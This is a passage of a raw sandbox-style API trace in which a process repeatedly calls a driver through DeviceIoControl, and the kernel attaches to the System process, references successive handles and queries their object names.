Object=0xfffff88005163548*=0xfffffa800e15a8e0, HandleInformation=0x0) returned 0x0 [0118.078] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.078] PsReleaseProcessExitSynchronization () returned 0x2 [0118.078] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.078] ObQueryNameString (in: Object=0xfffffa800e15a8e0, ObjectNameInfo=0xfffffa800286a284, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800286a284, ReturnLength=0xfffff88005163550) returned 0x0 [0118.078] ObfDereferenceObject (Object=0xfffffa800e15a8e0) returned 0x1 [0118.078] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.078] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.078] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.078] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xf6, lpOverlapped=0x0) returned 1 [0118.078] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.078] PsAcquireProcessExitSynchronization () returned 0x0 [0118.078] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.079] ObReferenceObjectByHandle (in: Handle=0xffffffff800002d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800372ff20, HandleInformation=0x0) returned 0x0 [0118.079] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.079] PsReleaseProcessExitSynchronization () returned 0x2 [0118.079] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.079] ObQueryNameString (in: Object=0xfffffa800372ff20, ObjectNameInfo=0xfffffa8002483044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002483044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.079] ObfDereferenceObject (Object=0xfffffa800372ff20) returned 0x2 [0118.079] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.081] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.081] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.081] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0118.081] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.081] PsAcquireProcessExitSynchronization () returned 0x0 [0118.081] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.081] ObReferenceObjectByHandle (in: Handle=0xffffffff800002d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037208e0, HandleInformation=0x0) returned 0x0 [0118.081] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.081] PsReleaseProcessExitSynchronization () returned 0x2 [0118.081] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.081] ObQueryNameString (in: Object=0xfffffa80037208e0, ObjectNameInfo=0xfffffa800269a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800269a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.081] ObfDereferenceObject (Object=0xfffffa80037208e0) returned 0x2 [0118.081] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.081] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.081] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.081] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x9c, lpOverlapped=0x0) returned 1 [0118.081] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.081] PsAcquireProcessExitSynchronization () returned 0x0 [0118.081] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.081] ObReferenceObjectByHandle (in: Handle=0xffffffff800002dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003727c00, HandleInformation=0x0) returned 0x0 [0118.081] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.081] PsReleaseProcessExitSynchronization () returned 0x2 [0118.081] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.081] ObQueryNameString (in: Object=0xfffffa8003727c00, ObjectNameInfo=0xfffffa8002805044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002805044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.082] ObfDereferenceObject (Object=0xfffffa8003727c00) returned 0x1 [0118.082] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.082] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.082] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.082] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0118.082] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.082] PsAcquireProcessExitSynchronization () returned 0x0 [0118.082] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.082] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003727ab0, HandleInformation=0x0) returned 0x0 [0118.082] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.082] PsReleaseProcessExitSynchronization () returned 0x2 [0118.082] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.082] ObQueryNameString (in: Object=0xfffffa8003727ab0, ObjectNameInfo=0xfffffa8002802044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002802044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.082] ObfDereferenceObject (Object=0xfffffa8003727ab0) returned 0x1 [0118.082] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.082] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.082] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.082] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0118.082] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.082] PsAcquireProcessExitSynchronization () returned 0x0 [0118.083] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.083] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800372d8e0, HandleInformation=0x0) returned 0x0 [0118.083] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.083] PsReleaseProcessExitSynchronization () returned 0x2 [0118.083] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.083] ObQueryNameString (in: Object=0xfffffa800372d8e0, ObjectNameInfo=0xfffffa80026aa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026aa044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.083] ObfDereferenceObject (Object=0xfffffa800372d8e0) returned 0x1 [0118.083] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.083] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.083] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.083] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x140, lpOverlapped=0x0) returned 1 [0118.083] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.083] PsAcquireProcessExitSynchronization () returned 0x0 [0118.083] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.083] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800372eda0, HandleInformation=0x0) returned 0x0 [0118.083] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.083] PsReleaseProcessExitSynchronization () returned 0x2 [0118.083] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.083] ObQueryNameString (in: Object=0xfffffa800372eda0, ObjectNameInfo=0xfffffa8002809044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002809044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.083] ObfDereferenceObject (Object=0xfffffa800372eda0) returned 0x2 [0118.083] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.083] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.084] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.084] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x140, lpOverlapped=0x0) returned 1 [0118.084] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.084] PsAcquireProcessExitSynchronization () returned 0x0 [0118.084] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.084] ObReferenceObjectByHandle (in: Handle=0xffffffff800002ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003733e20, HandleInformation=0x0) returned 0x0 [0118.084] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.084] PsReleaseProcessExitSynchronization () returned 0x2 [0118.084] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.084] ObQueryNameString (in: Object=0xfffffa8003733e20, ObjectNameInfo=0xfffffa800281a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.084] ObfDereferenceObject (Object=0xfffffa8003733e20) returned 0x2 [0118.084] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.084] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.084] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.084] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.084] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.084] PsAcquireProcessExitSynchronization () returned 0x0 [0118.084] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.084] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800372f880, HandleInformation=0x0) returned 0x0 [0118.084] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.084] PsReleaseProcessExitSynchronization () returned 0x2 [0118.084] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.084] ObQueryNameString (in: Object=0xfffffa800372f880, ObjectNameInfo=0xfffffa8002808044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002808044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.085] ObfDereferenceObject (Object=0xfffffa800372f880) returned 0x1 [0118.085] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.085] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.085] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0118.085] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.085] PsAcquireProcessExitSynchronization () returned 0x0 [0118.085] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.085] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037328b0, HandleInformation=0x0) returned 0x0 [0118.085] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.085] PsReleaseProcessExitSynchronization () returned 0x2 [0118.085] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.085] ObQueryNameString (in: Object=0xfffffa80037328b0, ObjectNameInfo=0xfffffa800283a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800283a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.085] ObfDereferenceObject (Object=0xfffffa80037328b0) returned 0x2 [0118.085] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.085] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.085] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.085] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.085] PsAcquireProcessExitSynchronization () returned 0x0 [0118.085] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.085] ObReferenceObjectByHandle (in: Handle=0xffffffff80000320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed4a90, HandleInformation=0x0) returned 0x0 [0118.085] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.085] PsReleaseProcessExitSynchronization () returned 0x2 [0118.085] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.085] ObQueryNameString (in: Object=0xfffffa8001ed4a90, ObjectNameInfo=0xfffffa800280b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.086] ObfDereferenceObject (Object=0xfffffa8001ed4a90) returned 0x2 [0118.086] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.086] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.086] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.086] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xf2, lpOverlapped=0x0) returned 1 [0118.086] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.086] PsAcquireProcessExitSynchronization () returned 0x0 [0118.086] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.086] ObReferenceObjectByHandle (in: Handle=0xffffffff80000324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037598a0, HandleInformation=0x0) returned 0x0 [0118.086] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.086] PsReleaseProcessExitSynchronization () returned 0x2 [0118.086] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.086] ObQueryNameString (in: Object=0xfffffa80037598a0, ObjectNameInfo=0xfffffa8002875044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002875044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.086] ObfDereferenceObject (Object=0xfffffa80037598a0) returned 0x2 [0118.086] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.086] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.086] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.086] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0118.086] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.086] PsAcquireProcessExitSynchronization () returned 0x0 [0118.086] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.086] ObReferenceObjectByHandle (in: Handle=0xffffffff80000328, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800374f9b0, HandleInformation=0x0) returned 0x0 [0118.086] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.086] PsReleaseProcessExitSynchronization () returned 0x2 [0118.086] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.087] ObQueryNameString (in: Object=0xfffffa800374f9b0, ObjectNameInfo=0xfffffa800287a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.087] ObfDereferenceObject (Object=0xfffffa800374f9b0) returned 0x1 [0118.087] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.087] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.087] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.087] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0118.087] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.087] PsAcquireProcessExitSynchronization () returned 0x0 [0118.087] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.087] ObReferenceObjectByHandle (in: Handle=0xffffffff8000032c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003756f20, HandleInformation=0x0) returned 0x0 [0118.087] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.087] PsReleaseProcessExitSynchronization () returned 0x2 [0118.087] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.087] ObQueryNameString (in: Object=0xfffffa8003756f20, ObjectNameInfo=0xfffffa8002879044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002879044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.087] ObfDereferenceObject (Object=0xfffffa8003756f20) returned 0x1 [0118.087] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.087] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.087] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.087] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0118.087] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.087] PsAcquireProcessExitSynchronization () returned 0x0 [0118.087] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.087] ObReferenceObjectByHandle (in: Handle=0xffffffff80000330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003756d50, HandleInformation=0x0) returned 0x0 [0118.087] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.088] PsReleaseProcessExitSynchronization () returned 0x2 [0118.088] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.088] ObQueryNameString (in: Object=0xfffffa8003756d50, ObjectNameInfo=0xfffffa8002878044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002878044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.088] ObfDereferenceObject (Object=0xfffffa8003756d50) returned 0x1 [0118.088] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.088] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.088] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.088] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x13c, lpOverlapped=0x0) returned 1 [0118.088] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.088] PsAcquireProcessExitSynchronization () returned 0x0 [0118.088] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.088] ObReferenceObjectByHandle (in: Handle=0xffffffff80000334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800375a940, HandleInformation=0x0) returned 0x0 [0118.088] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.088] PsReleaseProcessExitSynchronization () returned 0x2 [0118.088] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0118.088] ObQueryNameString (in: Object=0xfffffa800375a940, ObjectNameInfo=0xfffffa8002492044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002492044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.088] ObfDereferenceObject (Object=0xfffffa800375a940) returned 0x2 [0118.088] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.088] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.088] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.088] DeviceIoControl 